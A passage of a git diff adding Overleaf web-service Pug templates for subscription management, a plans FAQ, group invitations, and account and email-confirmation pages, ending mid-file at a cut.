(refered_user_count > 0) + p.thanks The Overleaf Bonus Program has been discontinued, but you'll continue to have access to the features you already earned. + else + p.thanks The Overleaf Bonus Program has been discontinued. + p.thanks Please <a href="/contact">contact us</a> if you have any questions. 
+ + if (refered_user_count > 0) + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner(style="position: relative; height: 30px; margin-top: 20px;") + - for (var i = 0; i <= 10; i++) { + if (refered_user_count == i) + .number(style="left: "+i+"0%").active #{i} + else + .number(style="left: "+i+"0%") #{i} + - } + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner + .progress + .progress-bar.progress-bar-info(style="width: "+refered_user_count+"0%") + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner(style="position: relative; height: 110px;") + .perk(style="left: 10%;", class = refered_user_count >= 1 ? "active" : "") #{translate("one_free_collab")} + .perk(style="left: 30%;", class = refered_user_count >= 3 ? "active" : "") #{translate("three_free_collab")} + .perk(style="left: 60%;", class = refered_user_count >= 6 ? "active" : "") #{translate("free_dropbox_and_history")} + #{translate("three_free_collab")} + .perk(style="left: 90%;", class = refered_user_count >= 9 ? "active" : "") #{translate("free_dropbox_and_history")} + #{translate("unlimited_collabs")} + .row   + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner.bonus-status + if (refered_user_count == 1) + p.thanks You’ve introduced <strong>1</strong> person to #{settings.appName}. + else + p.thanks You’ve introduced <strong>#{refered_user_count}</strong> people to #{settings.appName}. diff --git a/services/web/app/views/subscriptions/add-seats.pug b/services/web/app/views/subscriptions/add-seats.pug new file mode 100644 index 0000000..fb04ef9 --- /dev/null +++ b/services/web/app/views/subscriptions/add-seats.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/add-seats' + +block append meta + meta(name="ol-subscriptionData" data-type="json" content=subscriptionData) + meta(name="ol-groupName", data-type="string", content=groupName) + meta(name="ol-subscriptionId", data-type="string", content=subscriptionId) + meta(name="ol-totalLicenses", data-type="number", content=totalLicenses) + meta(name="ol-isProfessional", data-type="boolean", content=isProfessional) + +block content + main.content.content-alt#main-content + #add-seats-root diff --git a/services/web/app/views/subscriptions/canceled-subscription-react.pug b/services/web/app/views/subscriptions/canceled-subscription-react.pug new file mode 100644 index 0000000..3a89234 --- /dev/null +++ b/services/web/app/views/subscriptions/canceled-subscription-react.pug @@ -0,0 +1,10 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/canceled-subscription' + +block append meta + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#subscription-canceled-root diff --git a/services/web/app/views/subscriptions/dashboard-react.pug b/services/web/app/views/subscriptions/dashboard-react.pug new file mode 100644 index 0000000..dab505e --- /dev/null +++ b/services/web/app/views/subscriptions/dashboard-react.pug @@ -0,0 +1,34 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/dashboard' + +block head-scripts + script(type="text/javascript", nonce=scriptNonce, src="https://js.recurly.com/v4/recurly.js") + +block append meta + meta(name="ol-subscription" data-type="json" content=personalSubscription) + meta(name="ol-userCanExtendTrial" data-type="boolean" content=userCanExtendTrial) + meta(name="ol-managedGroupSubscriptions" data-type="json" 
content=managedGroupSubscriptions) + meta(name="ol-memberGroupSubscriptions" data-type="json" content=memberGroupSubscriptions) + meta(name="ol-managedInstitutions" data-type="json" content=managedInstitutions) + meta(name="ol-managedPublishers" data-type="json" content=managedPublishers) + meta(name="ol-planCodesChangingAtTermEnd" data-type="json", content=planCodesChangingAtTermEnd) + meta(name="ol-currentInstitutionsWithLicence" data-type="json" content=currentInstitutionsWithLicence) + meta(name="ol-hasSubscription" data-type="boolean" content=hasSubscription) + meta(name="ol-fromPlansPage" data-type="boolean" content=fromPlansPage) + meta(name="ol-plans" data-type="json" content=plans) + meta(name="ol-groupSettingsAdvertisedFor" data-type="json" content=groupSettingsAdvertisedFor) + meta(name="ol-canUseFlexibleLicensing" data-type="boolean", content=canUseFlexibleLicensing) + meta(name="ol-showGroupDiscount" data-type="boolean", content=showGroupDiscount) + meta(name="ol-groupSettingsEnabledFor" data-type="json" content=groupSettingsEnabledFor) + meta(name="ol-hasAiAssistViaWritefull" data-type="boolean", content=hasAiAssistViaWritefull) + meta(name="ol-user" data-type="json" content=user) + if (personalSubscription && personalSubscription.payment) + meta(name="ol-recurlyApiKey" content=settings.apis.recurly.publicKey) + meta(name="ol-recommendedCurrency" content=personalSubscription.payment.currency) + meta(name="ol-groupPlans" data-type="json" content=groupPlans) + +block content + main.content.content-alt#main-content + #subscription-dashboard-root diff --git a/services/web/app/views/subscriptions/manually-collected-subscription.pug b/services/web/app/views/subscriptions/manually-collected-subscription.pug new file mode 100644 index 0000000..1555ac2 --- /dev/null +++ b/services/web/app/views/subscriptions/manually-collected-subscription.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/manually-collected-subscription' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#manually-collected-subscription-root diff --git a/services/web/app/views/subscriptions/missing-billing-information.pug b/services/web/app/views/subscriptions/missing-billing-information.pug new file mode 100644 index 0000000..67d13f8 --- /dev/null +++ b/services/web/app/views/subscriptions/missing-billing-information.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/missing-billing-information' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#missing-billing-information-root diff --git a/services/web/app/views/subscriptions/plans/_faq_new.pug b/services/web/app/views/subscriptions/plans/_faq_new.pug new file mode 100644 index 0000000..baefb6e --- /dev/null +++ b/services/web/app/views/subscriptions/plans/_faq_new.pug @@ -0,0 +1,86 @@ +include ./_plans_faq_tabs +include ../../_mixins/eyebrow + +- var managingYourSubscription = 'managingYourSubscription' +- var overleafIndividualPlans = 'overleafIndividualPlans' +- var overleafGroupPlans = 'overleafGroupPlans' +.plans-faq + .row.row-spaced-extra-large + .col-md-12.faq-heading-container + h2 + +eyebrow(translate("frequently_asked_questions")) + | #{translate("your_questions_answered")} + + .row + .col-xs-12 + div( + class={ + 'plans-faq-tabs': 
bootstrapVersion === 5, + 'ol-tabs': bootstrapVersion === 5, + 'ol-tabs-scrollable': bootstrapVersion === 3 + } + ) + .nav-tabs-container + ul.nav.nav-tabs(role="tablist") + //- In the bs5 version of the plans page, the `active` class needs to be added to the `a` tag instead of the parent `li` tag + //- If the `plans-page-bs5` split test has been completed, remove the `active` class from the `li` tag since we're not using it anymore + //- If the `plans-page-bs5` split test has been completed, remove the `data-toggle` because it is not needed anymore (bs5 uses `data-bs-toggle`) + li( + role="presentation" + class={ + active: bootstrapVersion === 3 + } + ) + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + managingYourSubscription + aria-controls=managingYourSubscription + class={ + active: bootstrapVersion === 5 + } + ) + | #{translate('managing_your_subscription')} + li(role="presentation") + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + overleafIndividualPlans + aria-controls=overleafIndividualPlans + ) + | #{translate('overleaf_individual_plans')} + li(role="presentation") + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + overleafGroupPlans + aria-controls=overleafGroupPlans + ) + | #{translate('overleaf_group_plans')} + + .tab-content + .tab-pane.active( + role="tabpanel" + id=managingYourSubscription + ) + +managingYourSubscription() + .tab-pane( + role="tabpanel" + id=overleafIndividualPlans + ) + +overleafIndividualPlans() + .tab-pane( + role="tabpanel" + id=overleafGroupPlans + ) + +overleafGroupPlans() + + .row + .col-xs-12.plans-faq-support + span #{translate('still_have_questions')} + button(data-ol-open-contact-form-modal="general") + span(style="margin-right: 4px") #{translate('contact_support')} + i.icon-md.material-symbols.material-symbols-rounded.material-symbols-arrow-right(aria-hidden="true") arrow_right_alt diff --git a/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug b/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug new file mode 100644 index 0000000..f312ebe --- /dev/null +++ b/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug @@ -0,0 +1,356 @@ +//- If the `plans-page-bs5` split test has been completed, remove the `data-toggle` and `data-target` because they are no longer needed (bs5 uses `data-bs-toggle` and `data-bs-target`); see the reduced sketch of this dual-attribute pattern at the end of this section + +mixin managingYourSubscription() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ1" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ1" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ1" + ) + | Can I change plans or cancel later? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ1") + .custom-accordion-body + span Yes, you can do this at any time by going to + strong Account > Subscription + span when logged in to Overleaf. You can change plans, switch between monthly and annual billing options, or cancel to downgrade to the free plan. When canceling, your subscription will continue until the end of the billing period.
+ .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ2" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ2" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ2" + ) + | If I change or cancel my Overleaf plan, will I lose my projects? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ2") + .custom-accordion-body + | No. Changing or canceling your plan won’t affect your projects, the only change will be to the features available to you. You can see which features are available only on paid plans in the comparison table. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ3" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ3" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ3" + ) + | Can I pay by invoice or purchase order? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ3") + .custom-accordion-body + | This is possible when you’re purchasing a group subscription for five or more people, or a site license. For individual subscriptions, we can only accept payment online via credit card, debit card, or PayPal. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ4" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ4" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ4" + ) + | How do I view/update the credit card being charged for my subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ4") + .custom-accordion-body + | You can view and update the card on file by going to Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + | . + + + + +mixin overleafIndividualPlans() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ1" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ1" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ1" + ) + | How does the free trial work? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ1") + .custom-accordion-body + span You get full access to your chosen plan during your 7-day free trial, and there’s no obligation to continue beyond the trial. Your card will be charged at the end of your trial unless you cancel before then. 
To cancel, go to + strong Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + span when logged in to Overleaf (the trial will continue for the full 7 days). + + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ2" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ2" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ2" + ) + | What’s a collaborator on an Overleaf individual subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ2") + .custom-accordion-body + | A collaborator is someone you invite to work with you on a project. So, for example, on our Standard plan you can have up to 10 people collaborating with you on any given project. + + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ3" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ3" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ3" + ) + | The individual Standard plan has 10 project collaborators, does it mean that 10 people will be upgraded? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ3") + .custom-accordion-body + span No. Only the subscriber’s account will be upgraded. An individual Standard subscription allows you to invite 10 people per project to edit the project with you. Your collaborators can access features such as the full document history and extended compile time, but + strong only + span for the project(s) they’re working on with you. If your collaborators want access to those features on their own projects, they will need to purchase their own subscription. (If you work with the same people regularly, you might find a group subscription more cost effective.) + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ4" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ4" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ4" + ) + | Do collaborators also have access to the editing and collaboration features I’ve paid for? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ4") + .custom-accordion-body + span If you have an Overleaf subscription, then your project collaborators will have access to features like real-time track changes and document history, but + strong only + span for the project(s) they’re working on with you. If your collaborators want access to those features on their own projects, they will need to purchase their own subscription. (If you work with the same people regularly, you might find a group subscription more cost effective.) 
+ .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ5" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ5" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ5" + ) + | Can I purchase an individual plan on behalf of someone else? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ5") + .custom-accordion-body + | Individual subscriptions must be purchased by the account that will be the end user. If you want to purchase a plan for someone else, you’ll need to provide them with relevant payment details to enable them to make the purchase. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ6" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ6" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ6" + ) + | Who is eligible for the Student plan? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ6") + .custom-accordion-body + | As the name suggests, the Student plan is only for students at educational institutions. This includes graduate students. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ7" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ7" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ7" + ) + | Can I transfer an individual subscription to someone else? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ7") + .custom-accordion-body + | No. Individual plans can’t be transferred. + + + + + +mixin overleafGroupPlans() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ1" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ1" + aria-expanded="false" + aria-controls="overleafGroupPlansQ1" + ) + | What’s the difference between users and collaborators on an Overleaf group subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ1") + .custom-accordion-body + div On any of our group plans, the number of users refers to the number of people you can invite to join your group. All of these people will have access to the plan’s paid-for features across all their projects, such as real-time track changes and document history. + div.mt-2 Collaborators are people that your group users may invite to work with them on their projects. So, for example, if you have the Group Standard plan, the users in your group can invite up to 10 people to work with them on a project. And if you have the Group Professional plan, your users can invite as many people to work with them as they want. 
+ .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ2" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ2" + aria-expanded="false" + aria-controls="overleafGroupPlansQ2" + ) + | What is the benefit of purchasing an Overleaf Group plan? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ2") + .custom-accordion-body + | Our Group subscriptions allow you to purchase access to our premium features for multiple people. They’re easy to manage, help save on paperwork, and allow groups of 5 or more to purchase via purchase order (PO). We also offer discounts on purchases of Group subscriptions for more than 20 users; just get in touch with our + a.inline-green-link( + target="_blank" + href="/for/contact-sales" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Sales team + | . + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ3" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ3" + aria-expanded="false" + aria-controls="overleafGroupPlansQ3" + ) + | Who is eligible for the educational discount? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ3") + .custom-accordion-body + | The educational discount for group subscriptions is for students or faculty who are using Overleaf primarily for teaching. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ4" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ4" + aria-expanded="false" + aria-controls="overleafGroupPlansQ4" + ) + | How do I add more licenses to my group subscription, and what will it cost? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ4") + .custom-accordion-body + div + | You can add up to 20 licenses using the + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span subscription management page + | accessed by going to Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + | when logged into Overleaf. The cost per license will be prorated at the current per license rate, and will end with your existing renewal date. + div.mt-2 + | If you need more than 20 licenses added to your subscription, please + a.inline-green-link( + target="_blank" + href="/for/contact-sales" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span contact the Sales team + | . 
+ .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ5" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ5" + aria-expanded="false" + aria-controls="overleafGroupPlansQ5" + ) + | How do I upgrade my plan from Group Standard to Group Professional? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ5") + .custom-accordion-body + | You can upgrade your plan from Group Standard to Group Professional on the + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span subscription management page + | . diff --git a/services/web/app/views/subscriptions/preview-change.pug b/services/web/app/views/subscriptions/preview-change.pug new file mode 100644 index 0000000..ab70d2d --- /dev/null +++ b/services/web/app/views/subscriptions/preview-change.pug @@ -0,0 +1,11 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/preview-change' + +block append meta + meta(name="ol-subscriptionChangePreview" data-type="json" content=changePreview) + +block content + main.content.content-alt#main-content + #subscription-preview-change diff --git a/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug b/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug new file mode 100644 index 0000000..15f7948 --- /dev/null +++ b/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/subtotal-limit-exceeded' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#subtotal-limit-exceeded-root diff --git a/services/web/app/views/subscriptions/successful-subscription-react.pug b/services/web/app/views/subscriptions/successful-subscription-react.pug new file mode 100644 index 0000000..5ce208b --- /dev/null +++ b/services/web/app/views/subscriptions/successful-subscription-react.pug @@ -0,0 +1,12 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/successful-subscription' + +block append meta + meta(name="ol-subscription" data-type="json" content=personalSubscription) + meta(name="ol-postCheckoutRedirect" content=postCheckoutRedirect) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#subscription-success-root diff --git a/services/web/app/views/subscriptions/team/group-invites.pug b/services/web/app/views/subscriptions/team/group-invites.pug new file mode 100644 index 0000000..81c70f1 --- /dev/null +++ b/services/web/app/views/subscriptions/team/group-invites.pug @@ -0,0 +1,11 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-invites' + +block append meta + meta(name="ol-teamInvites" data-type="json" content=teamInvites) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt.team-invite#group-invites-root diff --git a/services/web/app/views/subscriptions/team/invite-managed.pug b/services/web/app/views/subscriptions/team/invite-managed.pug new file mode 100644 index 0000000..f59b8b4 --- /dev/null +++ 
b/services/web/app/views/subscriptions/team/invite-managed.pug @@ -0,0 +1,18 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/invite-managed' + +block append meta + meta(name="ol-inviteToken" content=inviteToken) + meta(name="ol-inviterName" content=inviterName) + meta(name="ol-expired" data-type="boolean" content=expired) + meta(name="ol-alreadyEnrolled" data-type="boolean" content=alreadyEnrolled) + meta(name="ol-validationStatus" data-type="json" content=validationStatus) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-groupSSOActive" data-type="boolean" content=groupSSOActive) + meta(name="ol-subscriptionId" data-type="string" content=subscriptionId) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt.team-invite#invite-managed-root diff --git a/services/web/app/views/subscriptions/team/invite.pug b/services/web/app/views/subscriptions/team/invite.pug new file mode 100644 index 0000000..dc1b509 --- /dev/null +++ b/services/web/app/views/subscriptions/team/invite.pug @@ -0,0 +1,17 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/invite' + +block append meta + meta(name="ol-hasIndividualRecurlySubscription" data-type="boolean" content=hasIndividualRecurlySubscription) + meta(name="ol-inviterName" data-type="string" content=inviterName) + meta(name="ol-inviteToken" data-type="string" content=inviteToken) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-expired" data-type="boolean" content=expired) + meta(name="ol-groupSSOActive" data-type="boolean" content=groupSSOActive) + meta(name="ol-subscriptionId" data-type="string" content=subscriptionId) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#invite-root diff --git a/services/web/app/views/subscriptions/team/invite_logged_out.pug b/services/web/app/views/subscriptions/team/invite_logged_out.pug new file mode 100644 index 0000000..d07fa53 --- /dev/null +++ b/services/web/app/views/subscriptions/team/invite_logged_out.pug @@ -0,0 +1,30 @@ +extends ../../layout-react + +block append meta + meta(name="ol-user" data-type="json" content=user) + +block content + - var colClass = bootstrapVersion === 5 ? 'col-lg-8 m-auto' : 'col-md-8 col-md-offset-2' + + main.content.content-alt.team-invite#main-content + .container + .row + div(class=colClass) + .card.text-center + .card-body + .page-header + // TODO: Remove `team-invite-name` once we fully migrated to Bootstrap 5 + h1.text-centered !{translate("invited_to_group", {inviterName: inviterName, appName: appName }, [{name: 'span', attrs: {class: 'team-invite-name'}}])} + + if (accountExists) + div + p #{translate("invited_to_group_login_benefits", {appName: appName})} + p #{translate("invited_to_group_login", {emailAddress: emailAddress})} + p + a.btn.btn-primary(href=`/login?redir=/subscription/invites/${inviteToken}${groupSSOActive ? "&hide_sso_login=true" : ""}`) #{translate("login_to_accept_invitation")} + else + div + p #{translate("invited_to_group_register_benefits", {appName: appName})} + p #{translate("invited_to_group_register", {inviterName: inviterName})} + p + a.btn.btn-primary(href=`/register?redir=/subscription/invites/${inviteToken}${groupSSOActive ? 
"&hide_sso_login=true" : ""}`) #{translate("register_to_accept_invitation")} diff --git a/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug b/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug new file mode 100644 index 0000000..c482629 --- /dev/null +++ b/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/upgrade-group-subscription' + +block append meta + meta(name="ol-subscriptionChangePreview" data-type="json" content=changePreview) + meta(name="ol-totalLicenses", data-type="number", content=totalLicenses) + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#upgrade-group-subscription-root diff --git a/services/web/app/views/user/accountSuspended.pug b/services/web/app/views/user/accountSuspended.pug new file mode 100644 index 0000000..da57f4d --- /dev/null +++ b/services/web/app/views/user/accountSuspended.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - metadata.robotsNoindexNofollow = true + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container-custom-sm.mx-auto + .card + h3 #{translate('your_account_is_suspended')} + p #{translate('sorry_this_account_has_been_suspended')} + p !{translate('please_contact_us_if_you_think_this_is_in_error', {}, [{name: 'a', attrs: {href: `mailto:${settings.adminEmail}`}}])} diff --git a/services/web/app/views/user/addSecondaryEmail.pug b/services/web/app/views/user/addSecondaryEmail.pug new file mode 100644 index 0000000..8f38df9 --- /dev/null +++ b/services/web/app/views/user/addSecondaryEmail.pug @@ -0,0 +1,12 @@ +extends ../layout-react + +block vars + - var suppressNavbar = true + - var suppressSkipToContent = true + +block entrypointVar + - entrypoint = 'pages/user/add-secondary-email' + +block content + main.content.content-alt + #add-secondary-email diff --git a/services/web/app/views/user/compromised_password.pug b/services/web/app/views/user/compromised_password.pug new file mode 100644 index 0000000..e56ffd9 --- /dev/null +++ b/services/web/app/views/user/compromised_password.pug @@ -0,0 +1,13 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressGoogleAnalytics = true + +block entrypointVar + - entrypoint = 'pages/compromised-password' + +block content + main.content.content-alt#main-content + #compromised-password diff --git a/services/web/app/views/user/confirmSecondaryEmail.pug b/services/web/app/views/user/confirmSecondaryEmail.pug new file mode 100644 index 0000000..4d0c59e --- /dev/null +++ b/services/web/app/views/user/confirmSecondaryEmail.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressSkipToContent = true + +block entrypointVar + - entrypoint = 'pages/user/confirm-secondary-email' + +block append meta + meta(name="ol-email" content=email) + +block content + main.content.content-alt + #confirm-secondary-email diff --git a/services/web/app/views/user/confirm_email.pug b/services/web/app/views/user/confirm_email.pug new file mode 100644 index 0000000..37c0488 --- /dev/null +++ b/services/web/app/views/user/confirm_email.pug @@ -0,0 +1,60 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + 
+block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2.col-lg-6.col-lg-offset-3 + .card + .page-header(data-ol-hide-on-error-message="confirm-email-wrong-user") + h1 #{translate("confirm_email")} + form( + method="POST" + action="/logout" + id="logoutForm" + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden", name="redirect", value=currentUrlWithQueryParams) + form( + data-ol-async-form, + data-ol-auto-submit, + name="confirmEmailForm" + action="/user/emails/confirm", + method="POST", + id="confirmEmailForm", + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden", name="token", value=token) + + div(data-ol-not-sent) + +formMessages() + div(data-ol-custom-form-message="confirm-email-wrong-user" hidden) + h1.h3 #{translate("we_cant_confirm_this_email")} + p !{translate("to_confirm_email_address_you_must_be_logged_in_with_the_requesting_account")} + p !{translate("you_are_currently_logged_in_as", {email: getUserEmail()})} + .actions + button.btn-primary.btn.btn-block( + form="logoutForm" + ) #{translate('log_in_with_a_different_account')} + + .actions + button.btn-primary.btn.btn-block( + type='submit', + data-ol-disabled-inflight + data-ol-hide-on-error-message="confirm-email-wrong-user" + ) + span(data-ol-inflight="idle") + | #{translate('confirm')} + span(hidden data-ol-inflight="pending") + i.fa.fa-fw.fa-spin.fa-spinner(aria-hidden="true") + |  #{translate('confirming')}… + + div(hidden data-ol-sent) + .alert.alert-success + | #{translate('thank_you_email_confirmed')} + div.text-center + a.btn.btn-primary(href="/user/settings") + | #{translate('go_to_account_settings')} diff --git a/services/web/app/views/user/email-preferences.pug b/services/web/app/views/user/email-preferences.pug new file mode 100644 index 0000000..465ffed --- /dev/null +++ b/services/web/app/views/user/email-preferences.pug @@ -0,0 +1,49 @@ +extends 